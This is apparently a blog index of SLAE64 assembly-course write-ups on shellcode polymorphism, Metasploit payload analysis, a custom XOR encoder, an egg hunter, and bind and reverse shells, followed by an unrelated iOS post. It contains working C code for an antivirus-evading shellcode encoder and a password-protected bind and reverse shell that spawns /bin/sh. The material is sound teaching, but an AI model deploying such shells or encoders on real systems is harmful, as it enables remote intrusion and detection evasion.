SLAE64: Assignment 6 – Polymorphic shellcodes

For assignment 6 of the SecurityTube Linux Assembly Expert certification the idea is to create polymorphic versions of existing shellcodes, specifically taken from shell-storm.org.

A polymorphic version of a shellcode keeps the same functionality but rewrites it with different instructions and registers, for example replacing xor rax, rax with sub rax, rax, or mov al, 59 with push 59 / pop rax, and interleaves harmless filler instructions, so that the byte sequence no longer matches a signature written for the original. The usual shellcode constraints still apply: the result must be free of bad bytes such as 0x00 and should not grow much beyond the original size, which is why the sizes are listed below.

For this assignment I chose the following shellcodes to work with:

  1. Linux/x86-64 – Read /etc/passwd – 82 bytes
  2. Linux/x86-64 – Add map in /etc/hosts file – 110 bytes
  3. Linux/x86-64 – setuid(0) + execve(/bin/sh) – 49 bytes


SLAE64: Assignment 5 – Metasploit payloads analysis #3

This is the last payload that I’ve debugged so far for the 5th assignment on SecurityTube Linux Assembly Expert certification.

This time I opted to look at the linux/x64/exec payload with the option to run ‘/bin/sh’.


SLAE64: Assignment 5 – Metasploit payloads analysis #1

For the 5th assignment of the SecurityTube Linux Assembly Expert certification, I needed to analyze some Metasploit payloads for Linux x64.

I started by looking at the linux/x64/shell_reverse_tcp.


SLAE64: Assignment 4 – Custom Encoder

This is assignment #4 for the SecurityTube Linux Assembly Expert certification. It consists of implementing a custom encoder.

Encoding is a common strategy for obfuscating a shellcode payload so as to evade signature and pattern-based detection: the payload bytes are transformed with a reversible scheme (XOR, add, rotate, or a combination) and prefixed with a small decoder stub that restores them in memory before jumping to them. The encoder has to respect the same constraints as the shellcode itself, above all that neither the stub nor the encoded bytes contain bad bytes such as 0x00, and the stub itself is still plain code that a signature can be written for.
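The following C program is an added example of such a custom encoder, not the encoder from the assignment write-up. It uses a chained XOR (each ciphertext byte becomes the key for the next byte), searches for a key that leaves no 0x00 in the output, and checks that the decoder loop, which is what the assembly stub would implement, restores the original. The sample payload is a hand-assembled execve("/bin//sh") stub included only as input; it is never executed.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed sample payload: a hand-assembled x86-64 execve("/bin//sh") stub.
 * It only serves as input to the encoder here and is never executed. */
const unsigned char payload[] = {
    0x48, 0x31, 0xf6,                                           /* xor rsi, rsi         */
    0x56,                                                       /* push rsi             */
    0x48, 0xbf, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x2f, 0x73, 0x68, /* mov rdi, "/bin//sh"  */
    0x57,                                                       /* push rdi             */
    0x54,                                                       /* push rsp             */
    0x5f,                                                       /* pop rdi              */
    0x6a, 0x3b,                                                 /* push 59 (execve)     */
    0x58,                                                       /* pop rax              */
    0x99,                                                       /* cdq -> rdx = 0       */
    0x0f, 0x05                                                  /* syscall              */
};

/* Bytes the encoded output must not contain. 0x00 is the usual one, because
 * the payload is often copied by strcpy-style code that stops at a NUL. */
const unsigned char BAD[] = { 0x00 };

/* Chained XOR: the ciphertext byte just produced becomes the key for the next
 * byte, so a run of identical plaintext bytes does not encode to a run of
 * identical ciphertext bytes as it would under a single-byte XOR. */
void encode(const unsigned char *in, unsigned char *out, size_t n, unsigned char key)
{
    for (size_t i = 0; i < n; i++) {
        out[i] = in[i] ^ key;
        key = out[i];
    }
}

/* Inverse of encode(); this loop is what the assembly decoder stub performs.
 * The ciphertext byte is read before it is overwritten so in == out works. */
void decode(const unsigned char *in, unsigned char *out, size_t n, unsigned char key)
{
    for (size_t i = 0; i < n; i++) {
        unsigned char c = in[i];
        out[i] = c ^ key;
        key = c;
    }
}

static int has_bad(const unsigned char *buf, size_t n)
{
    for (size_t i = 0; i < n; i++)
        for (size_t j = 0; j < sizeof BAD; j++)
            if (buf[i] == BAD[j]) return 1;
    return 0;
}

/* Smallest non-zero key whose output contains no bad byte, or -1 if none. */
int find_key(const unsigned char *in, size_t n)
{
    unsigned char tmp[512];
    if (n > sizeof tmp) return -1;
    for (int k = 1; k < 256; k++) {
        encode(in, tmp, n, (unsigned char)k);
        if (!has_bad(tmp, n)) return k;
    }
    return -1;
}

/* 1 if encoding the sample with `key` is bad-byte free and decodes back to
 * the original, 0 otherwise. */
int roundtrip(unsigned char key)
{
    unsigned char enc[sizeof payload], dec[sizeof payload];
    encode(payload, enc, sizeof payload, key);
    if (has_bad(enc, sizeof payload)) return 0;
    decode(enc, dec, sizeof payload, key);
    return memcmp(dec, payload, sizeof payload) == 0;
}

int main(void)
{
    int key = find_key(payload, sizeof payload);
    unsigned char enc[sizeof payload];
    if (key < 0) { puts("no usable key"); return 1; }
    encode(payload, enc, sizeof payload, (unsigned char)key);
    printf("key 0x%02x, encoded:", key);
    for (size_t i = 0; i < sizeof payload; i++) printf(" %02x", enc[i]);
    putchar('\n');
    return roundtrip((unsigned char)key) ? 0 : 1;
}
```

For this sample, key 0x01 is rejected because the seventh encoded byte comes out as 0x00, and 0x02 is the first key that works; a single-byte XOR with any key that happens to equal one of the payload bytes would fail for the same reason, which is why the key search belongs in the encoder rather than being hard-coded.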


SLAE64: Assignment 3 – Egg Hunter

This is the third assignment for the SecurityTube Linux Assembly Expert certification. It consists of demonstrating my own implementation of an Egg Hunter that works with different payloads.

An Egg Hunter is a small piece of code that searches memory for a specific pattern, the ‘egg’, in order to find its address. The egg is placed directly in front of a second, larger injected payload containing the actual shellcode, so once the hunter finds it, it jumps past the egg into that payload. The point is that the hunter itself is tiny and fits where the full payload would not.
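The C program below is an added example of the hunting logic, not the assembly hunter from the assignment. It assumes the usual Linux convention: the egg is a 4-byte tag written twice in a row (so the single copy of the tag inside the hunter's own compare instruction never matches), and unmapped memory is detected with the access(2) trick, since the kernel returns EFAULT when the "path" pointer it is given cannot be read. The tag value, the two-page arena and the 3-byte stand-in payload are constructed for the demo.

```c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

#ifndef MAP_ANONYMOUS
#define MAP_ANONYMOUS 0x20 /* Linux value, in case strict feature macros hide it */
#endif

/* Assumed 4-byte tag; the egg in memory is this tag twice in a row, so the
 * hunter's own single copy of the tag (its compare immediate) never matches. */
#define TAG 0x50905090u

/* Constructed stand-in for the second-stage payload (xor eax,eax; ret).
 * It is located, never executed. */
const unsigned char payload[] = { 0x31, 0xc0, 0xc3 };

/* The page-probe trick Linux egg hunters use: access(2) has to copy its path
 * argument from user memory, so pointing it at an unmapped or unreadable
 * address fails with EFAULT, while any readable address yields some other
 * result (usually ENOENT). */
static int readable(const void *p)
{
    errno = 0;
    (void)access((const char *)p, F_OK);
    return errno != EFAULT;
}

static const unsigned char *next_page(const unsigned char *p, size_t page)
{
    return (const unsigned char *)(((uintptr_t)p | (page - 1)) + 1);
}

/* Scan [start, start+len) for the egg. Unreadable pages are skipped a page at
 * a time; inside readable memory the scan advances one byte at a time. Both
 * ends of the 8-byte compare window are probed so the compare itself cannot
 * fault on a page boundary. Returns the address right after the egg, or NULL. */
const unsigned char *hunt(const unsigned char *start, size_t len)
{
    const uint32_t egg[2] = { TAG, TAG };
    const size_t page = (size_t)sysconf(_SC_PAGESIZE);
    const unsigned char *p = start, *end = start + len;

    while (p + sizeof egg <= end) {
        if (!readable(p)) { p = next_page(p, page); continue; }
        if (!readable(p + sizeof egg - 1)) { p = next_page(p + sizeof egg - 1, page); continue; }
        if (memcmp(p, egg, sizeof egg) == 0)
            return p + sizeof egg;
        p++;
    }
    return NULL;
}

/* Build a two-page arena that mimics what a hunter faces: page 0 is made
 * unreadable (an address-space hole), page 1 holds a lone copy of the tag
 * (a decoy, like the one embedded in the hunter's own code), then the real
 * egg followed by the payload. Returns 1 if hunt() lands exactly on the payload. */
int demo(void)
{
    const size_t page = (size_t)sysconf(_SC_PAGESIZE);
    unsigned char *arena = mmap(NULL, 2 * page, PROT_READ | PROT_WRITE,
                                MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (arena == MAP_FAILED) return 0;

    unsigned char *pg = arena + page;
    const uint32_t tag = TAG;
    memcpy(pg + 0x10, &tag, sizeof tag);          /* decoy: single tag, must not match */
    memcpy(pg + 0x100, &tag, sizeof tag);         /* egg: tag ...                      */
    memcpy(pg + 0x104, &tag, sizeof tag);         /* ... twice                         */
    memcpy(pg + 0x108, payload, sizeof payload);  /* payload immediately after it      */
    if (mprotect(arena, page, PROT_NONE) != 0) return 0;

    const unsigned char *hit = hunt(arena, 2 * page);
    int ok = hit == pg + 0x108 && memcmp(hit, payload, sizeof payload) == 0;
    munmap(arena, 2 * page);
    return ok;
}

int main(void)
{
    int ok = demo();
    printf("egg hunter demo: %s\n", ok ? "payload found" : "failed");
    return ok ? 0 : 1;
}
```

The assembly version does exactly this with two syscalls per probe and an 8-byte compare; the decoy at offset 0x10 is why the tag is doubled, and the PROT_NONE page is why the page probe is needed at all, since a plain byte-by-byte scan would crash on the first hole it hit.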


SLAE64: Assignment 2 – Reverse TCP Shell

This is the second assignment for the SecurityTube Linux Assembly Expert certification. It consists of creating a password-protected reverse shell.

A reverse shell is similar to a bind shell, but instead of waiting passively for remote connections it actively connects to a specified IP address and port, then redirects STDIN, STDOUT and STDERR of the spawned shell to that socket.


SLAE64: Assignment 1 – Bind TCP Shell with password

I’ve been taking the SecurityTube Linux Assembly Expert certification; this is the first assignment: the creation, in assembly, of a password-protected bind shell.

A bind shell is essentially a listening port on a machine: when a client connects, a shell is spawned with its STDIN, STDOUT and STDERR redirected to the accepted socket. It gets the name from the bind() system call, which is a necessary step before listening on a port.
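As an added example covering both the bind shell above and the reverse shell of assignment 2, here is the syscall sequence each one performs, written in C rather than assembly; it is not the author's code, and the password, port and address are assumed values chosen for the demo. Both variants share the same tail: read the password from the socket, compare it at exact length, and only then dup2() the socket over fd 0, 1 and 2 and execve() /bin/sh.

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Assumed password; the page does not state the one used in the assignments. */
#define PASSWORD "s3cret"

/* Fill a sockaddr_in the way the assembly does it: zeroed struct, AF_INET,
 * port in network byte order (4444 becomes the bytes 0x11 0x5c), dotted-quad address. */
struct sockaddr_in make_addr(const char *ip, unsigned short port)
{
    struct sockaddr_in a;
    memset(&a, 0, sizeof a);
    a.sin_family = AF_INET;
    a.sin_port = htons(port);
    inet_pton(AF_INET, ip, &a.sin_addr);
    return a;
}

/* Exact-length compare of what the client sent (optional trailing newline
 * stripped) against the expected password. A prefix or longer string is rejected. */
int password_ok(const char *got, size_t n, const char *want)
{
    size_t w = strlen(want);
    if (n > 0 && got[n - 1] == '\n') n--;
    return n == w && memcmp(got, want, w) == 0;
}

/* Common tail for both shells: gate on the password, then hand the socket to
 * /bin/sh as fd 0, 1 and 2. */
static void serve(int fd)
{
    char buf[64], sh[] = "/bin/sh";
    char *av[] = { sh, NULL };
    ssize_t n = read(fd, buf, sizeof buf);
    if (n <= 0 || !password_ok(buf, (size_t)n, PASSWORD)) {
        close(fd);
        return;
    }
    dup2(fd, 0);
    dup2(fd, 1);
    dup2(fd, 2);
    execve(sh, av, NULL);
}

/* Bind shell: socket -> bind -> listen -> accept, then serve the client. */
int bind_shell(unsigned short port)
{
    int s = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in a = make_addr("0.0.0.0", port);
    if (s < 0 || bind(s, (struct sockaddr *)&a, sizeof a) < 0 || listen(s, 1) < 0)
        return -1;
    int c = accept(s, NULL, NULL);
    if (c < 0) return -1;
    close(s);
    serve(c);
    return -1; /* only reached if the password check or execve failed */
}

/* Reverse shell: socket -> connect, then serve that same socket. */
int reverse_shell(const char *ip, unsigned short port)
{
    int s = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in a = make_addr(ip, port);
    if (s < 0 || connect(s, (struct sockaddr *)&a, sizeof a) < 0)
        return -1;
    serve(s);
    return -1;
}

int main(int argc, char **argv)
{
    if (argc == 2) return bind_shell((unsigned short)atoi(argv[1]));
    if (argc == 3) return reverse_shell(argv[1], (unsigned short)atoi(argv[2]));
    fprintf(stderr, "usage: %s <port>          (bind shell)\n"
                    "       %s <ip> <port>     (reverse shell)\n", argv[0], argv[0]);
    return 2;
}
```

The only structural difference between the two is bind/listen/accept versus connect; everything that makes the assembly version fiddly (the zeroed sockaddr_in, the port and address constants, the fixed-length password compare) is visible in make_addr() and password_ok(), which is where null bytes and hard-coded values end up in the shellcode.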


iOS launch crash with reference to “setValue:forUndefinedKey:”

Just found that I need to be really careful when refactoring code that requires me to remove views from my project. I spent about 15 minutes trying to understand what the hell was going on, I was just receiving the following error:

I tried completely deleting my project from the device and simulator, running it again and still the same error. It turns out that I had removed all code references to customView but completely forgot about removing the outlets in the xib (Yeah still not a fan of storyboard).

So I guess I won’t be CTRL-dragging to hook up outlets anymore; it’s actually better to CTRL-click on the element or use the Connections editor, because that way I can easily see warnings near broken or invalid connections.